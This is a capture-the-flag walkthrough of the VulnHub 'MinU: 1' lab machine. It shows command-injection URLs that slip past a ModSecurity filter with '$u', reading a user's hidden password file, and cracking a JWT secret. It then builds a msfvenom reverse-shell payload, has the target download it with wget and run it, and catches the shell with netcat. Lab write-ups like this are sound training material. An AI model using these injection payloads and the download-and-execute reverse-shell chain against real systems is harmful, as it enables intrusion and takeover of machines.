Hello Friends! Today we are going to
solve another CTF challenge “MinU: 1” This boot2root is an Ubuntu Based virtual
machine and has been tested using Virtual Box. The network interface of the
virtual machine will take its IP settings from DHCP. Your goal is to capture
the flag on /root.
You can download it from here:
https://www.vulnhub.com/entry/minu-1,235/
Level: Easy/Intermediate
Penetrating
Methodology
§ Network scanning (Nmap)
§ Web Directory Enumeration (Dirb)
§ Found RCE Vulnerability
§ Digging out JSON Web Token from inside ._pw_
§ Obtain password by using “c-jwt-cracker” for JSON Web Token
§ Generate elf
payload (msfvenom)
§ Upload the
backdoor inside /tmp
§ Obtain reverse
session (Netcat)
§ Go for root
access
§ Use envirnoment
shell to spwan proper tty shell
§ Capture the Flag
WalkThrough
Since the IP of the target machine is 192.168.1.108,
therefore let’s start with namp aggressive scan.
nmap –A 192.168.1.108
From the nmap scan result, we found port
80 is open for http service, let’s navigate to port 80 through browser.
Since we found nothing at the home page,
therefore next we used dirb for web directory enumeration.
dirb
http://192.168.1.108/ -X .php
With the help of above command, we try
to enumerate .php extension files and luckily we found a “test.php” file.
So, when we explored /test.php file in the
browser, it welcomes us with the following web page, where we found a hyperlink
for the next web page.
Here the web page “Read last visitor data” was
vulnerable to remote code execution. As you can observe that in the URL we try
to run pwd command. As result, it shown /var/www/html as the current directory.
Next, we had used wafwoof for scanning the
type of web application firewall used on the target machine.
wafw00f
http://192.168.1.108
After we run wafw00f we find that the
target machine has implemented modsecurity
as web application firewall.
After finding out the WAF, we bypass it by
executing following command in the URL.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+lsb_release
-a
Hence we found out the kernel details of
the target machine.
Similarly, we run following command to find
out available user directory inside the /home folder.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls
/home
So we found bob could be the name of user directory.
Then we run following command to view the
available file and folder inside /home/bob.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls
/home/bob
Here we found a file”._pw_”
Then we opened the above obtained file with
help of cat command and for that we run the following command.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+cat
/home/bob/._pw_
It put up some encoded text in front of us
which could be the password but I did not know much about it, what this was,
therefore I take help from google and found out that this is a JSON Web Token.
JSON Web Token (JWT) is an open standard
(RFC 7519) that defines a compact and self-contained way for securely
transmitting information between parties as a JSON object. This information can
be verified and trusted because it is digitally signed. JWTs can be signed
using a secret (with the HMAC algorithm) or a public/private key pair using RSA
or ECDSA.
Source: https://jwt.io/introduction/
So I found a tool from the github to crack
the JSON web token called c-jwt-cracker.
git
clone https://github.com/brendan-rius/c-jwt-cracker.git
cd
c-jwt-cracker/
apt-get
install libssl-dev
make
Copy the encoded text from the “._pw_” to decrypt it. Now run the c-jwt-crack tool and paste the
encoded string as its argument as shown in the image.
./jwtcrack
[paste code here]
This will give the password: “mlnv1”
Now let’s create a payload using msfvenom with
the help of following command:
msfvenom
-p linux/x86/shell_reverse_tcp lhost=192.168.1.106 lport=4444 -f elf >
/root/Desktop/shell
Above command will generate the elf
payload, now we will transfer this malicious file “shell” to the target with the
help of PHP server.
php
–S 0.0.0.0:80
Then download the above malicious file with
the help of wget, hence you can run the following command for downloading it
into target machine.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+wget+-O+/tmp/shell+http://192.168.1.106/shell
Now let’s check whether the file is
uploaded successfully or not!
Run following command to view the malicious
file “shell” file inside the /tmp directory.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls
/tmp
Yuppieee!!! In the given below image you
can observe that we have successfully uploaded the shell file.
Now give the full permission to the
uploaded file “shell” with the help of the following command:
Let’s verify the given permission with
help of the following command:
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+ls
-la /tmp/shell
Now let’s execute the file “shell” but
do not forget to start netcat as the listener.
http://192.168.1.108/test.php?file=www.hackingarticles.in;+$u+/tmp/shell
nc –lvp 4444
Hurray!!! We got the reverse shell of the
target’s machine and now let’s try to grab the flag.txt file to finish this
task. For grabbing the flag.txt file we need the root access and proper tty
shell of the machine.
Here we try to use python-one-liner to
spawn a tty shell but unfortunately python was not installed on the target
machine. So instead we used environment variable to spawn the tty shell.
Now run the following commands to spawn the
tty shell and then try to capture flag.txt file.
bash
-i
SHELL=/bin/bash
script -q /dev/null
su
root
Boooom!!!! We have root access now let’s
fetch the flag.txt file.
ls
cat
flag.txt
0 comments:
Post a Comment